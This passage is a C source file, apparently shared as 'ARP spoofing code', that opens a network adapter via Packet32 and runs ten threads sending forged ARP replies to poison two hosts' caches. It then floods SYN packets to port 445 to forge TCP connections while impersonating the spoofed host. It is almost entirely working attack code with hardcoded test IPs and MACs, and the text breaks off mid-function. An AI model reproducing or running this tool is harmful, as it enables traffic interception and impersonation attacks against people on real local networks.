arp.rar_arp欺骗代码

#include <winsock2.h> #include "Packet32.h" #include <stdio.h> #pragma comment(lib, "packet.lib") #pragma comment(lib, "ws2_32.lib") //下面几个宏是测试用的主机的IP和MAC #define SIMULATE_MAC "0011111d735a" //伪装主机的MAC地址 #define TARGET_MAC "001111c6f7fe" //目的主机的MAC地址 #define LOCAL_MAC "00e06e41508f" //本机MAC地址 #define TARGET_IP "192.168.0.2" //目的主机的IP #define SIMULATE_IP "192.168.0.1" //伪装主机的IP #define NDIS_PACKET_TYPE_DIRECTED 0x0001 //直接模式 #pragma pack(push, 1) struct ET_HEADER //以太网头部 { unsigned char eh_dst[6]; unsigned char eh_src[6]; unsigned short eh_type; }; struct ARP_HEADER //ARP头部 { unsigned short arp_hdr; unsigned short arp_pro; unsigned char arp_hln; unsigned char arp_pln; unsigned short arp_opt; unsigned char arp_sha[6]; unsigned long arp_spa; unsigned char arp_tha[6]; unsigned long arp_tpa; }; struct IP_HEADER //IP头部 { char m_ver_hlen; //4位版本号,4位ip头部长 char m_tos; USHORT m_tlen; USHORT m_ident; USHORT m_flag_frag; //3位标志位(1位未用位,1位DF,1位MF),13位片断偏移量 char m_ttl; char m_protocol; USHORT m_cksum; ULONG m_sIP; ULONG m_dIP; }; struct TCP_HEADER //TCP头部 { USHORT m_sport; USHORT m_dport; ULONG m_seq; ULONG m_ack; char m_hlen_res4; //4位tcp头部长,6位保留的前4位 char m_res2_flag; //6位保留的后2位,6位标志 USHORT m_win; USHORT m_cksum; USHORT m_urp; }; struct PSD_HEADER //伪头部，计算校验和用 { ULONG m_saddr; //源地址 ULONG m_daddr; //目的地址 char m_mbz; char m_ptcl; //协议类型 USHORT m_tcpl; //TCP长度 }; struct TCP_OPTION //TCP选项，发起伪连接时要用来与对方协商 { USHORT unKnown; USHORT maxSegSize; //MSS,以太网一般为1460 char no1; char no2; USHORT SACK; }; struct CHEAT_ARP_INFO //ARP欺骗线程的参数 { char simulateIP[20]; char targetIP[20]; char targetMAC[13]; }; #pragma pack(pop) USHORT CheckSum(USHORT *buffer, int size); //计算校验和的函数 void StrToMac(char *str,char *mac); //字符串转换为MAC地址 void ListenACK(); //监听函数,监听对方的回包 void AssayAndSendData(LPPACKET lpPacket); //分析数据帧并发送回包 DWORD WINAPI ArpCheat(void *pInfo); //ARP欺骗线程 DWORD WINAPI SendSyn(void *no); //发送SYN包的线程 LPADAPTER lpAdapter=NULL; //适配器指针 USHORT ipID=1638; //IP标识 USHORT sourcePort=1056; //起始源端口 USHORT targetPort=445; //目的端口 int main(int argc, char* argv[]) { WSADATA wsaData; if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0) { printf("WSAStartup error!\n"); return -1; } //打开适配器： WCHAR adapter_name[2048]={0}; ULONG adapter_length=1024; //取得所有适配器的名字. if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE) { //adapter_name:一个用于存放适配器的名字的缓冲区 //adapter_length:这个缓冲区的大小 printf("PacketGetAdapterNames error:%d\n",GetLastError()); return -1; } WCHAR *name1,*name2; ULONG i; static CHAR adapter_list[10][1024]; name1=adapter_name; name2=adapter_name; i=0; //把adapter_name中的适配器名字，分别copy到adapter_list[]中，i从0开始为第一个 while((*name1!='\0'|| (*(name1-1)!='\0'))) { if(*name1=='\0') { memcpy(adapter_list,name2,2*(name1-name2)); name2=name1+1; i++; } name1++; } //默认打开第一块适配器 lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]); if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE)) { printf("Unable to open the driver, Error Code : %lx\n", GetLastError()); return -1; } //创建ARP欺骗线程: CHEAT_ARP_INFO info1={0},info2={0},info3={0},info4={0},info5={0},info6={0},info7={0},info8={0},info9={0},info10={0}; memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC)); ::CreateThread(NULL,0,ArpCheat,&info1,0,NULL); memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info2,0,NULL); memcpy(info3.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info3.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info3.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info3,0,NULL); memcpy(info4.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info4.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info4.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info4,0,NULL); memcpy(info5.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info5.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info5.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info5,0,NULL); memcpy(info6.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info6.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info6.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info6,0,NULL); memcpy(info7.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info7.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info7.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info7,0,NULL); memcpy(info8.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info8.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info8.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info8,0,NULL); memcpy(info9.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info9.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info9.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info9,0,NULL); memcpy(info10.simulateIP,TARGET_IP,strlen(TARGET_IP)); memcpy(info10.targetIP,SIMULATE_IP,strlen(SIMULATE_IP)); memcpy(info10.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC)); ::CreateThread(NULL,0,ArpCheat,&info10,0,NULL); Sleep(50); //发送TCP伪连接的SYN数据帧： ::CreateThread(NULL,0,SendSyn,NULL,0,NULL); ListenACK(); //循环监听数据包 PacketCloseAdapter(lpAdapter); //关闭适配器 ::WSACleanup(); return 0; } DWORD WINAPI SendSyn(void *no) { Sleep(100); while(TRUE) //循环发送SYN包发起伪连接 { char s_mac[6]={0},d_mac[6]={0}; char sendSynBuf[128]={0}; ET_HEADER et_header={0}; IP_HEADER ip_header={0}; TCP_HEADER tcp_header={0}; TCP_OPTION tcp_option={0}; PSD_HEADER psd_header={0}; //填充以太头部： StrToMac(LOCAL_MAC,s_mac); //local_mac memcpy(et_header.eh_src,s_mac,6); StrToMac(TARGET_MAC,d_mac); //dest_mac memcpy(et_header.eh_dst,d_mac,6); et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包 //填充IP头部： ip_header.m_ver_hlen=(4<<4|5); ip_header.m_tos=0; ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION)); ip_header.m_ident=htons(ipID++); ip_head